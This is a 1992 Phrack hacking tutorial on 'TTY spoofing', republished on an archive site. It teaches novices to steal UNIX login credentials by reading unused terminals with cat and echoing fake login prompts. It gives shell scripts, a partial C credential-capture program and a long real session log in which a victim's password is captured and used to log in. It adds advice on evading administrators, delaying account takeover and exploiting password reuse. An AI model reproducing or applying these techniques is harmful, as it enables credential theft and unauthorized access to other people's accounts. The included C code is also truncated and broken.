AOH :: P41-08.TXT

TTY Spoofing

                                ==Phrack Inc.==

                   Volume Four, Issue Forty-One, File 8 of 13

                    +++++++                          +++++++
                    +++++++       TTY SPOOFING       +++++++
                    +++++++                          +++++++
                     ++++++            BY            ++++++
                      +++++                          +++++
                        +++         VaxBuster        +++
                         ++                          ++

                                 July 16, 1992

     Please note that this file is ONLY to be distributed as part of Phrack, 
and will NOT be distributed to any other person or magazine for release.

     More detailed instructions have been provided so that the novice hacker is 
able to understand them; therefore, all experienced hackers should be able to 
breeze right through this without having to worry about the specific command 
syntax provided.

     On UNIX systems, there are many ways to obtain account names and 
passwords.  Some hackers prefer to swipe the password file and run programs 
like Crack and Killer Cracker on them in order to get account names and 
passwords.  Others rely on bugs or holes in the system in order to gain root 
access.  Both these methods work, but what do you do if your password file is 
shadowed (and it is NOT a yellow pages file!)?  And what do you do if all the 
holes have been patched over from years of previous hackers abusing them? Well, 
I happen to have found a system where all this is true.  I have even allowed 
hackers to use one of my accounts to try to gain root privs, and of the 10 or 
so that have tried, they have all failed.  My only recourse was to find SOME 
other way to get accounts on the system to maintain MY security.

     TTY spoofing is often looked at as being lame, and some don't even 
consider it a "hacking technique."  People usually completely overlook it, and 
many others don't even know about it, or know HOW to do it.  I suppose I should 
start out by defining the term.  TTY spoofing is either installing a Trojan 
horse type program to sit and watch a certain (or multiple) tty and wait for a 
user to login.  Instead of getting the normal system prompt, the program YOU 
installed echoes the standard "login:" prompt, and then after they type in 
their username, it prompts them for "<username> password:" and boom, you have a 
new account.  This can be done by a program or, in many cases, manually.

     Of all the people I know, 90 percent of them scream at me saying that this 
is impossible because their system doesn't allow read/write access to the tty. 
When I make references to tty, I mean the physical device filename or 
/dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters 
(e.g., 03, pa, p4 are all valid).  Of all the systems I've been on, I've never 
seen one that doesn't allow reading/writing to a LOGIN process.  See, the 
system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND 
PASSWORD HAS BEEN VERIFIED.  Console, or ttyco, is an exception where the perms 
are ALWAYS -rw------.

     Now that you know WHAT tty spoofing is and the general idea behind WHY it 
works, I'll start to tell you the many ways it can be done.

     In order to tty spoof, you MUST have at least ONE valid account on the 
system.  You can obtain the account via a little social engineering, or you 
could try a /who *sitename in the IRC to get nicknames and use their username 
and try to hack out the password.  Try looking for users in #hottub and other 
st00pid channels because they are the ones who would tend to have the easy 
passwords.  Or use any other method that you can think of to obtain an account.

     Once you have an account, the rest is the easy part.  Simply create a 
script in vi or emacs that redirects input from UNUSED tty's to cat.  Since you 
are cat's standard output, everything coming FROM the monitored tty will come 
to your screen.  You probably want to watch about 10 or 15 terminals.  An 
example script would be: 
cat </dev/tty01&
cat </dev/tty02&
cat </dev/ttypa&
cat </dev/ttyp1&

     Then you want to just run your script with source.  Once a user walks up
to a terminal (or remotely logs in via telnet, etc.), they will try to press 
return and attempt to get a login prompt.  Many users will also type their
username, thinking that the system is just waiting for it.  Make sure you write
down the username.  After a while, they will probably start pressing control
characters, like control-d or z or whatever.  Here's the problem:  when CAT
encounters the ^D, it thinks that it is receiving an EOF in the file and it
thinks its job is done.  You'll get something to the effect of:

[2] Exit           DONE                        cat </dev/tty01


[2] Exit 1         cat:i/o error               cat </dev/tty01

You want to IMMEDIATELY (if not sooner) "recat" that terminal.  Once you get
that DONE signal, you now know WHAT terminal is active.  You want to then type
something to the effect of 'echo -n "login:" >/dev/tty01&'.  The & is important
because if the user decided to switch terminals, echo could lock up and freeze
your control on the account.  If after about 10 seconds echo doesn't come back

[5] Exit            DONE                        echo -n login: >/dev/tty01

KILL the process.  When you ran the echo command, the shell gave you a
processid.  Just type KILL processid.  If the done echo line DOES come back,
that means that it was successfully printed on the user's screen.  He will then
type in his username.  WRITE THIS DOWN.  If you are ever in doubt that the word
on your screen is a username, type 'grep word /etc/passwd' and if a line comes
up, you know it's valid.  If grep doesn't return anything, still keep it
because it might be a password.  Then wait about 2 seconds, and type
'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
lockage.  If that command doesn't come back in about 10 seconds, kill the
process off and you can assume that you lost the user (e.g. he moved to another
terminal).  If the done echo line DOES come back, then in about 2 seconds, you
SHOULD see his password come up.  If you do, write it down, and boom, you have
a new account.

     This may seem like a time consuming process and a lot of work, but
considering that if you have macros with the "cat </dev/tty" command and the
echo -n commands preset, it will be a breeze.  Okay - so you say to yourself,
"I'm a lazy shit, and just want passwords to be handed to me on a silver
platter."  With a little bit of work, you can do that!  Below is a few lines of
C source code that can be used to automate this process.  Anyone who knows C
should be able to put something together in no time.

#include <stdio.h>

FILE *fp, *fp2;
char username[10], password[10];

      fp=fopen("/dev/ttyp1", "r");
      fp2=fopen("/dev/ttyp1", "w");

      fprintf(fp2, "login:");
      fscanf(fp, "%s", &username);

      /* Put delay commands in here */

      fprintf(fp2, "%s password:", username);
      fscanf(fp, "%s", @password);

      printf("Your new account info is %s, with password %s.", username,

     This is a VERY basic setup.  One could fairly easily have the program take
arguments from the command line, like a range of tty's, and have the output
sent to a file.

     Below is an actual session of manual tty spoofing.  The usernames and
passwords HAVE been changed because they will probably be active when you read
this.  Some c/r's and l/f's have been cut to save space.  Please notice the
time between the startup and getting a new account is only seven minutes.
Using this technique does not limit the hacked passwords to dictionary
derivatives like Crack and other programs.

source mycats                              ; This file contains cats
                                    ; for terminals tty03 - tty10
[1] 29377
/dev/tty03: Permission denied       ; All this means is that someone is logged 
                                ; and has their mesg set to NO.  Ignore it.

[1]    Exit 1               cat < /dev/tty03
[2] 29378
[3] 29379
/dev/tty06: Permission denied
/dev/tty05: Permission denied
[4]    Exit 1               cat < /dev/tty06
[3]    Exit 1               cat < /dev/tty05
/dev/tty07: Permission denied
[3]    Exit 1               cat < /dev/tty07
/dev/tty08: Permission denied
[3]    Exit 1               cat < /dev/tty08
[2]  + Stopped (tty input)    cat < /dev/tty04      ;This was the terminal I 
                                                ;on - it's automatically
[3] 29383
<5:34pm><~> /dev/tty09: Permission denied
[3]    Exit 1               cat < /dev/tty09
<5:34pm><~> source mycats2                  ;This one contains 34 - 43

[3] 29393
[4] 29394
[5] 29395
[6] 29396
[7] 29397
[8] 29398
[9] 29399
/dev/tty36: Permission denied
/dev/tty37: Permission denied
/dev/tty38: Permission denied
/dev/tty39: Permission denied
/dev/tty40: Permission denied
/dev/tty34: Permission denied
/dev/tty35: Permission denied

[9]    Exit 1               cat < /dev/tty40
[8]    Exit 1               cat < /dev/tty39
[7]    Exit 1               cat < /dev/tty38
[6]    Exit 1               cat < /dev/tty37
[5]    Exit 1               cat < /dev/tty36
[4]    Exit 1               cat < /dev/tty35
[3]    Exit 1               cat < /dev/tty34

[1] 29400
[3] 29401
[4] 29402

<5:34pm><~> /dev/tty41: Permission denied

[1]    Exit 1               cat < /dev/tty41
/dev/tty43: Permission denied
[4]    Exit 1               cat < /dev/tty43
/dev/tty42: Permission denied
[3]    Exit 1               cat < /dev/tty42

<5:34pm><~> source mycats3                        ;This contains p1-pa

[3] 29404
[4] 29405
[5] 29406
[6] 29407
[7] 29408
/dev/ttyp1: Permission denied
/dev/ttyp3: Permission denied
/dev/ttyp5: Permission denied
/dev/ttyp6: Permission denied

[8]    Exit 1               cat < /dev/ttyp6
[7]    Exit 1               cat < /dev/ttyp5
[5]    Exit 1               cat < /dev/ttyp3
[3]    Exit 1               cat < /dev/ttyp1
[7] 29410
[8] 29411
[9] 29412
[1] 29413

<5:34pm><~> /dev/ttyp7: Permission denied

[7]    Exit 1               cat < /dev/ttyp7
/dev/ttypa: Permission denied
[1]    Exit 1               cat < /dev/ttypa

<5:34pm><~> source mycats4                         ;Last one is q0-qa

[1] 29426
[3] 29427
[5] 29428
[7] 29429
[10] 29430
[11] 29431
/dev/ttyq5: Permission denied

[10]   Exit 1               cat < /dev/ttyq5
[12] 29432
[10] 29433
[13] 29434
[14] 29435
<5:34pm><~> who

<5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
pigsnort                                ; Important!  Write down ALL non-
                              ; system sent messages!
grep pigsnort /etc/passwd               ; Check with grep to see if it's an
                              ; account.

<5:35pm><~>                             ; Didn't return anything - must be a
                              ; a password!

nnnpptst8                               ; Sure looks like an account name to
nnnnn=====                              ; me!  Write it down!


[8]    Done                   cat < /dev/ttyp8  ; Asshole pressed control-d.
                                    ; 'recat' the terminal!

<5:36pm><~> cat  < /d e v/  ttyp8&             ; This is the 'recat.'

[8] 29459
<5:36pm><~> cat: read error: I/O error            ; Asshole is now trying all
                                    ; sorts of control characters
                                    ; sending UNIX into a fit.
[4]    Exit 1               cat < /dev/ttyp2

<5:36pm><~> cat </dev/ttyp2&                  ; 'recat' it!

[4] 29465


[6]    Done                   cat < /dev/ttyp4  ; Someone had to press the
                                                ; character, so this is active.

<5:36pm><~> cat </dev/ttyp4&                  ; 'recat' the ctrl-d.

[6] 29468
<5:36pm><~> echo -n "login:" >/dev/ttyble1      ; Try echo'ing a fake login
cat: read error: I/O error                  ; to the active terminal.

[6]    Exit 1               cat < /dev/ttyp4
poop4d                                          ; Here goes another password.
p4                                              ; Couldn't find the matching
&                                    ; account.

[6] 29470
<5:37pm><~> cat: read error: I/O error

[4]    Exit 1               cat < /dev/ttyp2

<5:37pm><~> cat </dev/ttyp2&

[4] 29489
<5:37pm><~> echo -n "login:" >/dev/ttyp2&      ; Try echo'ing a fake login
                                    ; prompt again.
[15] 29490
<5:37pm><~> kill 29490                        ; Login prompt didn't return
                                    ; within a few seconds so we
                                                ; kill it.

[15]   Terminated             echo -n login: > /dev/ttyp2
<5:37pm><~> cat </dev/tty 
echo -n "login:" >/dev/ttyp4&

[15] 29491
<5:38pm><~> kill 29491

<5:38pm><~> grep pptst8 /etc/passwd             ; Make sure it's an account!

pptst8:X:58479:4129:People Eater:/
<5:38pm><~> grep ble1 /etc/passwd               ; This isn't an account...

<5:39pm><~> grep poop4d /etc/passwd             ; Neither is this - probably
                                    ; a password...

<5:39pm><~> who                              ; See if any of the users we
                                    ; caught fell through an
                                    ; 'uncatted' terminal...

<5:39pm><~> ps -x                               ; View all our processes.
                                    ; DAMN glad that the cat's
  PID TT STAT  TIME COMMAND                     ; don't come up in the process
29266 04 S     0:04 -tcsh (tcsh)            ; list!
29378 04 T     0:00 cat
29412 04 I     0:00 -tcsh (tcsh)
29426 04 I     0:00 -tcsh (tcsh)
29427 04 I     0:00 -tcsh (tcsh)
29428 04 I     0:00 -tcsh (tcsh)
29429 04 I     0:00 -tcsh (tcsh)
29431 04 I     0:00 -tcsh (tcsh)
29432 04 I     0:00 -tcsh (tcsh)
29433 04 I     0:00 -tcsh (tcsh)
29434 04 I     0:00 -tcsh (tcsh)
29435 04 I     0:00 -tcsh (tcsh)
29459 04 I     0:00 -tcsh (tcsh)
29470 04 D     0:00 <exiting>
29489 04 I     0:00 -tcsh (tcsh)
29491 04 D     0:00 -tcsh (tcsh)
29547 04 R     0:00 ps -x
<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29

435 29459 29470 29489 289491                    ;Kill off all processes.

29470: No such process

[4]    Terminated             cat < /dev/ttyp2
[8]    Terminated             cat < /dev/ttyp8
[14]   Terminated             cat < /dev/ttyqa
[13]   Terminated             cat < /dev/ttyq9
[10]   Terminated             cat < /dev/ttyq8
[12]   Terminated             cat < /dev/ttyq7
[11]   Terminated             cat < /dev/ttyq6
[7]    Terminated             cat < /dev/ttyq4
[5]    Terminated             cat < /dev/ttyq3
[3]    Terminated             cat < /dev/ttyq2
[1]    Terminated             cat < /dev/ttyq1
[9]    Terminated             cat < /dev/ttyp9
[2]    Terminated             cat < /dev/tty04


[15]   Terminated             echo -n login: > /dev/ttyp4
[6]    Done                   echo -n login: > /dev/ttyp4

<5:41pm><~> ps -x

29266 04 S     0:04 -tcsh (tcsh)
29594 04 R     0:00 ps -x
<5:41pm><~> logout

Local -011- Session 1 disconnected from UNIX1 

Local> c unx                                    ; Notice it's a different
                                                ; system but shares passwords.
Local -010- Session 1 to UNX on node MYUNX established

Welcome to

login: ble1                                     ; Test out all the accounts
ble1 password:  [I tried poop4d]                ; with all the passwords.
Login failed.
login: pptst8
pptst8 password: [I tried poop4d here too.]
Login failed.
login: pptst8
pptst8 password: [I typed pigsnort]
Authenticated via AFS Kerberos.                 ; BINGO!  We're in!
Checking system rights for <pptst8>... login permitted.
login 1.0(2), Authen
Last login: Fri Jul 17 17:33:30 on tty11

(1) unix $ ls                                   ; Let's see what this sucker
                                                ; IRC user, eh?
Mail      Mailbox      News      bin      irc      other      junk      private      
(2) unix $ logout

Local -011- Session 1 disconnected from UNX

     A few words of advice:  Monitor the tty's when it's the busiest time of 
the day, usually about 11am on a university system.  Kill all your processes 
before you hang up.  Those processes that you run will sit on the system and 
can be found by sysadmins.  Also, they will tie up those tty's that you are 
monitoring, which can also cause problems.  Point is, you DON'T want to attract 
attention to what you're doing.  Don't test the accounts you get immediately. 
If the victim happens to be doing a 'who' and sees two of himself, he is going 
to shit.  Wait until later or use a different subsystem that won't show up on 
his 'who'.

Don't take over accounts.  All the real user has to do is call up the office 
and tell them that their password was changed.  In two seconds, it'll be 
changed back, plus the sysadmin will be on the lookout so you're just one step 
BEHIND where you started.  Once you have someone's account info, kill the cat 
that is sucking the terminal so that the user can log in normally.  If he 
continues not to get ANYTHING, he may go and solicit some "professional" help, 
and THEY might know what's going on, so let the sucker log in.  Another thing:  
with accounts you get.

DO NOT DESTROY ANYTHING in the system, not in their account, and no where else 
if you get higher privs.  Chances are that the person is NOT going to know 
someone has obtained their password, and will have NO reason to change it.  
Wait until his college term/semester ends and then monitor the file dates.  If 
after about a month the dates don't change, change the password and do whatever 
you want to the account because he's probably done with it.

Oh and one last thing.  Once you have a valid account, grep the username and 
get the REAL name.  Then grep the REAL name and find out all accounts on the 
system that the guy owns.  Chances are that he is using the same password in 
multiple accounts!

Thanks go to Pointman, #hack members, and the entire current/past Phrack staff 
for putting out an excellent magazine over the years.

If you need to contact me, try the IRC in #hack and the VMB world.  I usually 
prefer NOT to be contacted by e-mail, but if you have my address and have an 
important question, go for it.  I'm willing to help any beginners who need it.

Happy Hacking!

VaxBuster '92

AOH Site layout & design copyright © 2006 AOH